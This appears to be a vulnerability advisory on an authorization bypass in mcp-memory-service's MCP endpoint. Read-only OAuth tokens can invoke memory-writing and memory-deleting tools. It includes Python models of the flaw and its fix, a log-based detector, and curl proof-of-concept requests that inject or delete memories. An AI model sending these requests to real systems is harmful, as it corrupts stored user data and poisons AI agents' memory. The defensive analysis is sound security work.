How CVE-2026-49291 Works
The vulnerability resides in the MCP (Model Context Protocol) JSON‑RPC endpoint at `/mcp` of the mcp‑memory‑service, a semantic memory layer for AI applications. Prior to version 10.65.3, this endpoint is protected only by OAuth `read` scope for all incoming requests. When a request to `tools/call` is received, the service extracts the requested tool name and its arguments, then directly invokes `handle_tool_call(storage, tool_name, arguments)` without passing the authenticated user or performing any per‑tool scope check.
The MCP tool registry includes both read‑only tools and mutating tools such as `store_memory` and `delete_memory`. Because no additional authorization is enforced at the tool level, a client possessing only a read‑scoped OAuth token can call these write operations through the MCP endpoint. The `store_memory` tool creates a new `Memory` object and calls `storage.store(...)`, while `delete_memory` invokes `storage.delete(content_hash)`. Both reach the underlying storage sinks.
By contrast, the REST API correctly enforces the intended boundary: `POST /api/memories` uses `Depends(require_write_access)` and rejects a read‑only token with a `403 insufficient_scope` response. This inconsistency allows a read‑only client to bypass the write‑scope requirement and perform unauthorized data modifications or deletions, compromising the integrity of the memory database.
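The dispatch flaw described above, as an added illustration that is not the project's own code: a minimal model of the pre‑10.65.3 `/mcp` handling next to a hardened version that looks up the scope each tool needs before `handle_tool_call` is reached. Only `store_memory`, `delete_memory` and the call shape `handle_tool_call(storage, tool_name, arguments)` come from the advisory; the `Storage` class, the `dispatch_*` function names, the JSON‑RPC error codes and the read‑only tool names are assumptions made for the example.

```python
"""Added illustration (not mcp-memory-service code): endpoint-level 'read'
check only, versus a per-tool scope table consulted before any storage sink.
Names marked 'assumed' are invented for this example."""
import hashlib
from dataclasses import dataclass, field

# Scope each tool requires. store_memory/delete_memory are named on the page;
# the two read-only tool names are assumed placeholders.
TOOL_REQUIRED_SCOPE = {
    "retrieve_memory": "read",   # assumed read-only tool
    "search_by_tag": "read",     # assumed read-only tool
    "store_memory": "write",
    "delete_memory": "write",
}


@dataclass
class Storage:
    """Constructed in-memory stand-in for the real storage backend."""
    memories: dict = field(default_factory=dict)

    def store(self, content: str) -> str:
        content_hash = hashlib.sha256(content.encode()).hexdigest()[:16]
        self.memories[content_hash] = content
        return content_hash

    def delete(self, content_hash: str) -> bool:
        return self.memories.pop(content_hash, None) is not None


def handle_tool_call(storage, tool_name, arguments):
    """Stand-in for the real handler: reaches the storage sinks directly,
    with no knowledge of who is calling."""
    if tool_name == "store_memory":
        return {"content_hash": storage.store(arguments["content"])}
    if tool_name == "delete_memory":
        return {"deleted": storage.delete(arguments["content_hash"])}
    if tool_name in TOOL_REQUIRED_SCOPE:
        return {"results": list(storage.memories.values())}
    raise ValueError(f"unknown tool {tool_name}")


def jsonrpc_error(req_id, code, message):
    return {"jsonrpc": "2.0", "id": req_id,
            "error": {"code": code, "message": message}}


def dispatch_vulnerable(storage, token_scopes, request):
    """Pre-fix behaviour: one endpoint-wide 'read' check, then straight to the handler."""
    if "read" not in token_scopes:
        return jsonrpc_error(request.get("id"), -32001, "insufficient_scope")
    if request.get("method") != "tools/call":
        return jsonrpc_error(request.get("id"), -32601, "method not found")
    params = request["params"]
    result = handle_tool_call(storage, params["name"], params.get("arguments", {}))
    return {"jsonrpc": "2.0", "id": request.get("id"), "result": result}


def dispatch_fixed(storage, token_scopes, request):
    """Hardened: resolve the tool's required scope and refuse before any sink runs."""
    if "read" not in token_scopes:
        return jsonrpc_error(request.get("id"), -32001, "insufficient_scope")
    if request.get("method") != "tools/call":
        return jsonrpc_error(request.get("id"), -32601, "method not found")
    params = request["params"]
    tool_name = params["name"]
    required = TOOL_REQUIRED_SCOPE.get(tool_name)
    if required is None:
        # Fail closed: a tool missing from the table is denied, not passed through.
        return jsonrpc_error(request.get("id"), -32601, f"unknown tool {tool_name}")
    if required not in token_scopes:
        return jsonrpc_error(request.get("id"), -32001,
                             f"insufficient_scope: tool '{tool_name}' requires '{required}'")
    result = handle_tool_call(storage, tool_name, params.get("arguments", {}))
    return {"jsonrpc": "2.0", "id": request.get("id"), "result": result}


def demo():
    """Replay the page's store_memory PoC with a read-only token against both dispatchers."""
    req = {"jsonrpc": "2.0", "id": 1, "method": "tools/call",
           "params": {"name": "store_memory",
                      "arguments": {"content": "mcp read scope stored this", "tags": ["poc"]}}}
    vuln_storage, fixed_storage = Storage(), Storage()
    dispatch_vulnerable(vuln_storage, {"read"}, req)
    fixed = dispatch_fixed(fixed_storage, {"read"}, req)
    return {
        "vulnerable_stored": len(vuln_storage.memories),  # sink reached
        "fixed_stored": len(fixed_storage.memories),      # rejected before the sink
        "fixed_error": fixed["error"]["message"],
    }


if __name__ == "__main__":
    print(demo())
```

The fix is a lookup, not a new authentication layer: the token is already verified at the endpoint, so the only missing piece is a table mapping each registered tool to the scope it needs, consulted before dispatch. Failing closed on tools absent from the table keeps a newly registered mutating tool from silently inheriting the old behaviour.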
DailyCVE Form:
Platform: ……. mcp-memory-service
Version: …….. prior to 10.65.3
Vulnerability :…… OAuth read‑only clients can invoke mutating MCP tools
Severity: ……. High (CVSS 8.1)
Date: ………. 2026‑06‑19
Prediction: ….. 2026‑06‑26 (expected patch release within one week)
What Undercode Say:
Analytics
- Attack Vector: Remote, requires a valid OAuth token with only `read` scope.
- Weakness: Missing Authorization (CWE‑862).
- Affected Component: `src/mcp_memory_service/web/api/mcp.py` – the `mcp_endpoint` relies on `require_read_access` and does not filter tools by scope.
- Impact Scope: Unauthorised data injection and deletion, affecting AI agent context and stored user memories.
Bash Commands & Codes
1. Generate a read‑only OAuth token (example using `curl` and `jq`; assumes an OAuth token endpoint that returns a JWT with scope "read"):
TOKEN=$(curl -s -X POST https://auth.example.com/oauth/token \
-d "grant_type=client_credentials&scope=read" \
-u "client_id:client_secret" | jq -r '.access_token')
2. Confirm REST write endpoint rejects the token:
curl -X POST https://mcp-memory-service.example.com/api/memories \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"content":"rest denied control"}'
Expected: HTTP 403 with "Required scope 'write' not granted"
3. Exploit via MCP `tools/call` to store a memory:
curl -X POST https://mcp-memory-service.example.com/mcp \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "store_memory",
"arguments": {
"content": "mcp read scope stored this",
"tags": ["poc"]
}
}
}'
Observed: HTTP 200 JSON‑RPC success, storage sink reached
4. Exploit via MCP to delete a memory (requires known content_hash):
curl -X POST https://mcp-memory-service.example.com/mcp \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.0",
"id": 2,
"method": "tools/call",
"params": {
"name": "delete_memory",
"arguments": {"content_hash": "<known_hash>"}
}
}'
Observed: HTTP 200 JSON‑RPC success, storage delete sink reached
Exploit:
An attacker holding a read‑only OAuth token can call the `/mcp` endpoint directly with the `tools/call` method, naming `store_memory` or `delete_memory` as the tool. Because the endpoint enforces no per‑tool scope restriction, the request is forwarded to the mutating handlers, resulting in unauthorised creation or deletion of memory entries. The exploit requires no privilege beyond that read‑scoped token and can be performed remotely. It is particularly dangerous in multi‑agent systems, where memory integrity is critical for correct AI behaviour.
Protection:
- Upgrade to mcp‑memory‑service version 10.65.3 or newer, which enforces `write` scope for mutating MCP tools.
- Until the upgrade is applied, treat every read‑scoped token as if it carried `write`: audit which clients hold such tokens, revoke any that are not trusted to modify memories, and keep issuing only the minimal scopes each client needs so the blast radius stays small once the fix is in place.
- Monitor RPC invocation logs for unexpected `store_memory` or `delete_memory` calls and alert operations staff when such events are detected.
- Implement additional middleware or API gateway rules to block `tools/call` requests with mutating tool names unless the token includes `write` scope, until an upgrade is possible.
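A detection pass for the monitoring item above, as an added example that is not part of the advisory or the project: it reads RPC invocation logs and flags `tools/call` requests for mutating tools made by tokens whose scopes do not include `write`. The JSON‑lines log format and its field names (`client`, `scopes`, `method`, `tool`, `status`) are assumptions, and the sample lines are constructed; adapt the field names to whatever your deployment actually emits.

```python
"""Added example (not from the project): flag mutating MCP tool calls made
without 'write' scope in a JSON-lines invocation log. Log format is assumed."""
import json
from collections import Counter

# Mutating tools named on the page; extend if your deployment registers more.
MUTATING_TOOLS = {"store_memory", "delete_memory"}

# Constructed sample log (one JSON object per line, assumed format). Line 6 is
# deliberately malformed to show the parser skipping rather than aborting.
SAMPLE_LOG = """\
{"ts":"2026-06-19T10:00:01Z","client":"agent-reader","scopes":["read"],"method":"tools/call","tool":"retrieve_memory","status":200}
{"ts":"2026-06-19T10:00:02Z","client":"agent-reader","scopes":["read"],"method":"tools/call","tool":"store_memory","status":200}
{"ts":"2026-06-19T10:00:03Z","client":"agent-writer","scopes":["read","write"],"method":"tools/call","tool":"store_memory","status":200}
{"ts":"2026-06-19T10:00:04Z","client":"agent-reader","scopes":["read"],"method":"tools/call","tool":"delete_memory","status":200}
{"ts":"2026-06-19T10:00:05Z","client":"agent-reader","scopes":["read"],"method":"tools/list","tool":null,"status":200}
not json at all
"""


def parse_log(text):
    """Yield (line_number, record) for each well-formed JSON object line."""
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line: skip it, keep scanning
        if isinstance(rec, dict):
            yield lineno, rec


def find_scope_violations(text):
    """Return mutating tools/call invocations whose token lacked 'write'."""
    alerts = []
    for lineno, rec in parse_log(text):
        if rec.get("method") != "tools/call":
            continue
        tool = rec.get("tool")
        if tool not in MUTATING_TOOLS:
            continue
        scopes = set(rec.get("scopes") or [])
        if "write" in scopes:
            continue
        alerts.append({
            "line": lineno,
            "ts": rec.get("ts"),
            "client": rec.get("client"),
            "tool": tool,
            "scopes": sorted(scopes),
            "status": rec.get("status"),
        })
    return alerts


def violations_by_client(alerts):
    """Count alerts per client so the noisiest read-only caller surfaces first."""
    return dict(Counter(a["client"] for a in alerts))


if __name__ == "__main__":
    found = find_scope_violations(SAMPLE_LOG)
    for a in found:
        print(f"ALERT line {a['line']}: {a['client']} called {a['tool']} "
              f"with scopes {a['scopes']} (HTTP {a['status']})")
    print(violations_by_client(found))
```

On a vulnerable build these alerts will carry HTTP 200, which is the signature of the bypass succeeding; after upgrading to 10.65.3 the same calls should be rejected, so any alert that still shows a 200 status points at a regression or a gateway rule that is not being applied.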
Impact:
A client intended to be read‑only can inject false or malicious memories into the database, or delete existing ones, through the MCP API. This can corrupt the memory database, influence future agent context with tampered data, and destroy stored user memories without the OAuth `write` scope required by the REST API. The CVSS score of 8.1 (High) reflects the significant risk to data integrity and availability. Successful exploitation undermines the reliability of AI applications that depend on the semantic memory layer, potentially leading to incorrect inferences or denial of service.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

